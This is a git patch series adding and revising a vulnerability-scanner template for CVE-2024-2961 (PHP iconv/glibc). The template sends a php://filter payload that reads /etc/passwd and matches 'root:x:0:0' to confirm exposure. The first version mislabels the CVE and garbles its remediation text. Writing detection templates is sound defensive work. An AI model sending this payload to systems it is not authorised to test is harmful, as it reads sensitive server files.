From 86bab299827d32bf2756121ff9dd05c4c99a5638 Mon Sep 17 00:00:00 2001 From: DongyoungKim Date: Thu, 8 Aug 2024 10:41:17 +0900 Subject: [PATCH 1/3] Create CVE-2024-2961.yaml --- CVE-2024-2961.yaml | 34 ++++++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 CVE-2024-2961.yaml diff --git a/CVE-2024-2961.yaml b/CVE-2024-2961.yaml new file mode 100644 index 0000000000..2e969f3bfa --- /dev/null +++ b/CVE-2024-2961.yaml @@ -0,0 +1,34 @@ +hid: CVE-2024-2961 + +info: + name: PHP File Read to Remote Code Execution Through GNU C Library Iconv => CVE-2020-1957 + author: Kim Dongyoung (Kairos-hk), bolkv, n0ming, RoughBoy0723 + severity: High + description: | + If your application has an arbitrary file read vulnerability by allowing a buffer overflow, remote May lead to code execution. + impact: | + Gain unauthorized access or random access from your PHP application This can be exploited to execute code. + remediation: | + GNU C Library versions 2.39 and older. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-2961 + - https://github.com/vulhub/vulhub/tree/master/php/CVE-2024-2961 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H + cvss-score: 7.3 + cve-id: CVE-2024-2961 + tags: cve,cve2024, php, iconv, glibc + + +requests: + - method: POST + path: + - "{{BaseURL}}" + body: "file=php://filter/read=convert.iconv.UTF-8/ISO-2022-CN-EXT/resource=/etc/passwd" + headers: + Content-Type: application/x-www-form-urlencoded + + matchers: + - type: word + words: + - "root:x:0:0" From 73d428ecff5ef22d18b7bd54551e4be5d88f2d07 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 8 Oct 2024 16:54:27 +0700 Subject: [PATCH 2/3] Update and rename CVE-2024-2961.yaml to dast/cves/2024/CVE-2024-2961.yaml --- CVE-2024-2961.yaml | 34 ---------------------- dast/cves/2024/CVE-2024-2961.yaml | 48 +++++++++++++++++++++++++++++++ 2 files changed, 48 insertions(+), 34 deletions(-) delete mode 100644 CVE-2024-2961.yaml create mode 100644 dast/cves/2024/CVE-2024-2961.yaml diff --git a/CVE-2024-2961.yaml b/CVE-2024-2961.yaml deleted file mode 100644 index 2e969f3bfa..0000000000 --- a/CVE-2024-2961.yaml +++ /dev/null @@ -1,34 +0,0 @@ -hid: CVE-2024-2961 - -info: - name: PHP File Read to Remote Code Execution Through GNU C Library Iconv => CVE-2020-1957 - author: Kim Dongyoung (Kairos-hk), bolkv, n0ming, RoughBoy0723 - severity: High - description: | - If your application has an arbitrary file read vulnerability by allowing a buffer overflow, remote May lead to code execution. - impact: | - Gain unauthorized access or random access from your PHP application This can be exploited to execute code. - remediation: | - GNU C Library versions 2.39 and older. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2024-2961 - - https://github.com/vulhub/vulhub/tree/master/php/CVE-2024-2961 - classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H - cvss-score: 7.3 - cve-id: CVE-2024-2961 - tags: cve,cve2024, php, iconv, glibc - - -requests: - - method: POST - path: - - "{{BaseURL}}" - body: "file=php://filter/read=convert.iconv.UTF-8/ISO-2022-CN-EXT/resource=/etc/passwd" - headers: - Content-Type: application/x-www-form-urlencoded - - matchers: - - type: word - words: - - "root:x:0:0" diff --git a/dast/cves/2024/CVE-2024-2961.yaml b/dast/cves/2024/CVE-2024-2961.yaml new file mode 100644 index 0000000000..b9b9c4320a --- /dev/null +++ b/dast/cves/2024/CVE-2024-2961.yaml @@ -0,0 +1,48 @@ +id: CVE-2024-2961 + +info: + name: PHP - LFR to Remote Code Execution + author: Kim Dongyoung (Kairos-hk),bolkv,n0ming,RoughBoy0723 + severity: high + description: | + PHP Local File Read vulnerability leading to Remote Code Execution + impact: | + Remote attackers can execute arbitrary code on the server + remediation: | + Update PHP to the latest version and sanitize user input to prevent LFR attacks + reference: + - https://github.com/vulhub/vulhub/tree/master/php/CVE-2024-2961 + - https://nvd.nist.gov/vuln/detail/CVE-2024-2961 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H + cvss-score: 7.3 + cve-id: CVE-2024-2961 + cwe-id: CWE-787 + epss-score: 0.00046 + epss-percentile: 0.17835 + tags: cve,cve2024,php,iconv,glibc,lfr,rce + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + - 'method == "POST"' + condition: and + + payloads: + phppayload: + - "php://filter/read=convert.iconv.UTF-8/ISO-2022-CN-EXT/resource=/etc/passwd" + + stop-at-first-match: true + fuzzing: + - part: query + type: postfix + mode: single + fuzz: + - "{{phppayload}}" + + matchers: + - type: regex + regex: + - "root:x:0:0" From 46b3f671de1856a01bc32a8f64ebe07336e99aac Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 18 Oct 2024 17:22:33 +0530 Subject: [PATCH 3/3] updated req and added flow --- dast/cves/2024/CVE-2024-2961.yaml | 19 +++++++++++++++---- 1 file changed, 15 insertions(+), 4 deletions(-) diff --git a/dast/cves/2024/CVE-2024-2961.yaml b/dast/cves/2024/CVE-2024-2961.yaml index b9b9c4320a..f16493fb0f 100644 --- a/dast/cves/2024/CVE-2024-2961.yaml +++ b/dast/cves/2024/CVE-2024-2961.yaml @@ -19,16 +19,27 @@ info: cve-id: CVE-2024-2961 cwe-id: CWE-787 epss-score: 0.00046 - epss-percentile: 0.17835 - tags: cve,cve2024,php,iconv,glibc,lfr,rce + epss-percentile: 0.17937 + tags: cve,cve2024,php,iconv,glibc,lfr,rce,dast + +flow: http(1) && http(2) http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: dsl + dsl: + - '!regex("root:x:0:0", body)' + internal: true + - pre-condition: - type: dsl dsl: - 'method == "GET"' - 'method == "POST"' - condition: and payloads: phppayload: @@ -37,7 +48,7 @@ http: stop-at-first-match: true fuzzing: - part: query - type: postfix + type: replace mode: single fuzz: - "{{phppayload}}"